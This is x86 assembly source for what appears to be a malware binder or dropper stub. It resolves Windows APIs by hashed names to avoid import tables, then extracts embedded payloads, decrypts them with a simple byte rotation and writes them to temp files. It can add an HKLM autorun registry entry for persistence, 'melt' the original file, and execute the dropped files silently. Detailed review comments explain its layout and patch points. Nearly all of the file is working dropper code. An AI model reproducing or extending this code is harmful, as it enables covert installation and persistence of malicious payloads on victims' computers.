📄 stub.asm
lea eax, _szOpen
push eax
push ebx
call _GetTempFileName
; Get extension/filename length
pop esi
mov edx, esi
call __lstrlen
add ecx, 12
sub _dwLen, ecx
; Set extension for temp file/new filename
mov edx, ebx ; offset lpBuf
call __lstrlen
shr dword ptr[esp], 12 ; dwParams
.IF CARRY?
lea edx, [edx+ecx-4] ; Replace extension only
.ELSE
; Delete .tmp files created by windows
pushad
push ebx
call _DeleteFile
popad
std ; Replace entire filename
lea edi, [edx+ecx]
mov al, '\'
repnz scasb
mov edx, edi
inc edx
inc edx
cld
.ENDIF
; Extension/filename decrypt & copy
xor ecx, ecx
call __lstrcpyd
; Create temporary file with needed extension
xor eax, eax
push eax ; hTemplateFile
push [esp+8] ; dwFlagsAndAttributes
mov cl, 2
push ecx ; CREATE_ALWAYS
push eax ; lpSecurityAttributes
push ecx ; FILE_SHARE_WRITE
shl ecx, 29
push ecx ; GENERIC_WRITE
push ebx ; FileName
call _CreateFile
mov edi, eax
inc eax
jz @w_ret
mov ecx, _dwLen
jecxz @skip_write
jmp @pack_disabled ; Should be fixed from GUI (STUB_FIX1)
; Unpack
call _aP_depack_asm
mov esi, _lpMem
mov ecx, eax
@pack_disabled:
; Packing isn't enabled
mov eax, ecx
; Decrypt
@decrypt:
dec eax
ror byte ptr[esi+eax], 03h
jnz @decrypt
; Write data
push eax
lea eax, _dwLen
push eax
push ecx
push esi
push edi
call _WriteFile
@skip_write:
; Close handle
push edi
call _CloseHandle
pop edi ; dwParams
shr edi, 1
.IF CARRY?
; Melting source
inc ecx ; do not decrypt
mov esi, ebx ; src
mov edx, offset lpMeltSrc ; dest
call __lstrcpyd
.ENDIF
pop eax ; add esp, 4 (dwFileAttributes)
; --- SAFE ZONE --- ;
pop edx ; offset to szKey
shr edi, 1
.IF CARRY?
; Add to autorun
push eax ; sub esp, 4
push esp ; &hk
push edx ; szKey
push 80000002h ; HKEY_LOCAL_MACHINE
call _RegCreateKey ; Create hk handle
mov edx, ebx ; Source string
call __lstrlen ; Get length of the buffer
push ecx ; Length of the buffer
push ebx ; Buffer
push 1 ; REG_SZ
push 0 ;!! Reserved
push ebx ; Keyname
push dword ptr[esp+4*5] ; hk
call _RegSetValueEx ; Write registry entry
pop eax ; add esp, 4
.ENDIF
; Execute temp file
shr edi, 1
.IF !CARRY?
pop edx ; lpOfsArgs
shr edi, 1
.IF CARRY?
push edx
; Get current filename
mov edi, offset lpSelfPath
push 500 ; nSize
push edi ; lpFilename
push 0 ; hModule
call _GetModuleFileName
mov edx, edi
call __lstrlen
add edi, ecx
std
mov al, '\'
repnz scasb
xor eax, eax
cld
inc edi
stosb
mov ah, 2 ; eax = 512
; Quote filenames
pop edx
push edi ; source3
mov ecx, ebx
add ecx, eax
push ecx ; source2 (lpSelfPath)
add ecx, eax
push ecx ; source1 (lpMeltSrc)
push edx ; fmt
add ecx, eax
push ecx ; dest (lpAltArgs)
call _wsprintf
add esp, 4*5 ; Yup, C calling convention
; Make edx point to current filename
mov edx, offset lpAltArgs
.ENDIF
push _lpPath
push edx ; arguments
push ebx
lea eax, _szOpen
push eax
push 0
call _ShellExecute
.ENDIF
@w_ret:
mov esp, _esp
ret
; IN: edx - pointer to string, OUT: ecx (length including NULL)
_lstrlen::
xor ecx, ecx
@@:
inc ecx
cmp byte ptr[edx+ecx-1], 0
jnz @B
retn
; IN: esi - input pointer, ecx - decrypt flag (zero = decrypt) OUT: [edx]
_lstrcpyd::
lodsb
jecxz @F
rol al, 4
@@:
ror al, 4
mov [edx], al
inc edx
test al, al
jnz _lstrcpyd
retn
; IN: esi - input pointer
_lstrcpyd2::
ror byte ptr[esi], 4
lodsb
dec _dwLen
test al, al
jnz _lstrcpyd2
retn
Write endp
; Export table parser
; ---------------------------------------------------------------------------
; GetFunctions - resolve imports by name hash from one module's export table
;
; IN:  ebx - image base of the module (CommonLoad puts LoadLibrary's result here)
;      ebp - start of the hash table (dwFuncs): a run of dwords, each either a
;            function-name hash still to be resolved or an already resolved
;            address; the scan stops at the first dword whose LOW BYTE is 0
; OUT: every table dword equal to the hash of an exported name is overwritten
;      in place with that export's VA.  ecx = 0 on return (loop counter ran
;      out; assumes NumberOfNames > 0, otherwise 'loop' wraps around).
; Clobbers: eax, ecx, edx, esi, edi, flags.  ebx/ebp untouched.  Stack balanced.
;
; Hash: h = 0; for each byte b of the name: h = rol(h, 3); h ^= b (xor into dl
; only, the rotate is 32-bit).  The table is scanned from its start for EVERY
; exported name, so the one table serves all four DLLs loaded from 'start'.
;
; NOTE(review): the terminator test at @scan_dw_funcs is byte-wide.  Once an
; entry has been replaced by an address whose low byte happens to be 00h, the
; scan for every later name stops at that entry and the hashes behind it stay
; unresolved.  Forwarded exports are not special-cased (the value read from
; AddressOfFunctions is taken as code), and no PE field is bounds-checked, so
; a malformed module would be followed blindly.
; ---------------------------------------------------------------------------
GetFunctions proc
mov edx, [ebx+3ch] ; e_lfanew: offset of the PE signature
mov esi, [ebx+edx+78h] ; DataDirectory[EXPORT].VirtualAddress (RVA)
lea esi, [ebx+esi+18h] ; VA of IMAGE_EXPORT_DIRECTORY.NumberOfNames
lodsd
xchg eax, ecx ; ecx = NumberOfNames (outer loop counter)
lodsd ; AddressOfFunctions (RVA, kept unrebased)
push eax ; becomes [esp+4] once the next push lands
lodsd ; AddressOfNames (RVA)
add eax, ebx
xchg eax, edx ; edx = AddressOfNames VA
lodsd ; AddressOfNameOrdinals (RVA)
add eax, ebx
push eax ; [esp] = cursor into the ordinal array, advanced by 2 per name
mov esi, edx ; esi walks AddressOfNames in step with the ordinal cursor
@next_func:
lodsd ; RVA of the next exported name
add eax, ebx ; eax = name VA
; Calc function name hash
xor edx, edx
@calc_hash:
rol edx, 3
xor dl, byte ptr[eax] ; first byte is hashed unconditionally; stops on the NUL after it
inc eax
cmp byte ptr[eax], 0
jnz @calc_hash
; Get offset to ordinal
mov eax, [esp] ; AddressOfNameOrdinals
add dword ptr[esp], 2 ; Move to next ordinal word
mov edi, ebp ; restart the table scan from the top for this name
@scan_dw_funcs:
cmp dword ptr[edi], edx
.IF ZERO?
; Needed function found
movzx eax, word ptr[eax] ; Name ordinal
shl eax, 2 ; Multiply by 4
add eax, [esp+4] ; + AddressOfFunctions RVA
add eax, ebx ; VA of the AddressOfFunctions entry
mov eax, [eax] ; function RVA
add eax, ebx ; function VA
stosd ; overwrite the hash with the address; edi += 4
.ELSE
; Skip function hash
scasd ; edi += 4 (comparison result is not used)
.ENDIF
cmp byte ptr[edi], 0 ; end of table when the next dword's low byte is 0 (see NOTE above)
jnz @scan_dw_funcs
db 90h ;!!!! literal NOP byte; purpose not visible here - presumably size/offset padding for the GUI patcher, do not remove
loop @next_func ; ecx = names remaining
pop eax ; discard ordinal cursor
pop eax ; discard AddressOfFunctions RVA
ret
GetFunctions endp
; ---------------------------------------------------------------------------
; CommonLoad - load one DLL and resolve the hash table against its exports
;
; IN:  edi - pointer to the NUL-terminated DLL name (LoadLibrary argument)
;      ebp - hash table start (see GetFunctions)
; OUT: ebx - module base returned by LoadLibrary (the base GetFunctions parsed)
;      ecx - 0 (GetFunctions' loop counter ran out)
; edi is preserved: 'uses edi' makes MASM emit push edi / pop edi around the
; body; the caller then steps edi to the next DLL name itself.
; Clobbers: eax, ecx, edx, esi.  The LoadLibrary result is not checked for
; NULL - on failure GetFunctions would dereference 0 + 3Ch.
; How LoadLibrary itself is reached is not visible in this listing; it must
; already be callable before kernel32's other exports are resolved here.
; ---------------------------------------------------------------------------
CommonLoad proc uses edi
push edi ; lpLibFileName; no esp fixup follows, so the (stdcall) callee removes it
call LoadLibrary
xchg eax, ebx ; ebx = module base for GetFunctions (eax is overwritten there before use)
call GetFunctions
ret
CommonLoad endp
; OEP
; ---------------------------------------------------------------------------
; start - original entry point (OEP) of the stub
;
; Flow: resolve APIs by name hash from kernel32/user32/shell32/advapi32 (so
; the stub needs no import-table entries for them), then walk the embedded
; payload records backwards from a VA patched in by the GUI and hand each one
; to Write.  Write (above) drops the record to a temp file via
; GetTempFileName/CreateFile, decrypts it with ROR 3 per byte, optionally
; writes an HKLM (80000002h) autorun value and ShellExecutes the result.
; Ends with ExitProcess(0).
;
; Layout assumptions (not declared here, inferred from the constants):
;  - the four DLL names sit back to back after szKernel and the hash table
;    dwFuncs follows them; the edi steps below (9, 7, 8) and the 9+7+8+9 = 33
;    byte offset to dwFuncs are consistent with "kernel32\0" "user32\0"
;    "shell32\0" "advapi32\0" - confirm against the data section (not shown)
;  - payload records are [data bytes][dword length], stored downwards from the
;    patched VA; a zero length terminates.  The length fields are trusted
;    completely: nothing bounds esi to the image, so a corrupt length reads
;    outside it.
; GUI patch sites: the two 0AABBCCDDh immediates and the jmp tagged STUB_FIX2
; (plus STUB_FIX1 inside Write).  Instruction sizes before those sites must
; therefore not change.
; ---------------------------------------------------------------------------
start:
mov edi, offset szKernel ; first DLL name
lea ebp, [edi+7+8+9+9] ; dwFuncs: hash table that follows the four names
; kernel32.dll imports
call _CommonLoad
; user32.dll imports
add edi, 9 ; skip "kernel32\0"
call _CommonLoad
; shell32.dll imports
add edi, 7 ; skip "user32\0"
call _CommonLoad
; advapi32.dll imports
add edi, 8 ; skip "shell32\0"
call _CommonLoad
mov ebx, offset lpBuf ; filename / scratch buffer Write works in
mov byte ptr[ebx+1024], 0 ; force a NUL at offset 1024 of the buffer (backstop for the NUL-scanning helpers in Write, presumably)
mov esi, 0AABBCCDDh ; This will be replaced with needed VA from GUI (top of the payload area)
; Alloc memory for packing
jmp @read_loop ; Should be fixed from GUI (STUB_FIX2) - skips GlobalAlloc while packing is disabled
push 0AABBCCDDh ; dwBytes: placeholder, patched by the GUI
push ecx ; uFlags = 0 (GMEM_FIXED); relies on ecx being 0 after _CommonLoad (GetFunctions' loop ran to zero)
call _GlobalAlloc
mov _lpMem, eax ; buffer Write reads after _aP_depack_asm; a NULL result is not checked
@read_loop:
; Go to data offset
sub esi, 4 ; the length dword sits just below the previous record
mov ecx, [esi]
jecxz @terminate ; zero length = end of payload list
mov _dwLen, ecx
sub esi, ecx ; esi = start of this record's data
call Write
jmp @read_loop
@terminate:
push ecx ; uExitCode = 0 (ecx is zero here)
call _ExitProcess
end start